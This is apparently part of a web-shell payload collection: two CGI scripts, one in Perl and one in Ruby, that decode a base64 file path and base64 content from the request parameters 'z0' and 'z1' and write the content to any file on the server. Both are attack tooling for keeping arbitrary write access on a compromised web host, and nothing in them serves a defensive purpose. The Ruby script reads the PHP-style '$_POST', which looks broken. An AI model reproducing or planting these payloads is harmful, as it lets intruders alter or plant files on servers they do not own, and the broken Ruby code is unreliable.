File: Payload/Perl/CGI/OneShell/file_write.pl
use strict;
use CGI;
use warnings;
use MIME::Base64;

my $q = CGI->new;
my $file_path = decode_base64($q->param('z0') // '');
my $content = decode_base64($q->param('z1') // '');

sub main {
    if (!$file_path) {
        print "ERROR://Missing file path";
        return;
    }

    open(my $fh, '>', $file_path) or do {
        print "ERROR://Unable to open file.";
        return;
    };

    print $fh $content or do {
        print "ERROR://Write failed";
        close($fh);
        return;
    };

    close($fh);
    print "1";

    return;
}

main();

File: Payload/Ruby/CGI/OneShell/file_write.rb
require 'base64'

def main
  sz_file_path = Base64.decode64($_POST['z0'].to_s)
  sz_content   = Base64.decode64($_POST['z1'].to_s)

  begin
    File.open(sz_file_path, 'wb') do |file|
      file.write(sz_content)
    end
    
    print '1'

  rescue Errno::EACCES, Errno::ENOENT => e
    print 'ERROR://Unable to open file.'

  rescue => ex
    print "ERROR://#{ex.message}"
  end
end

main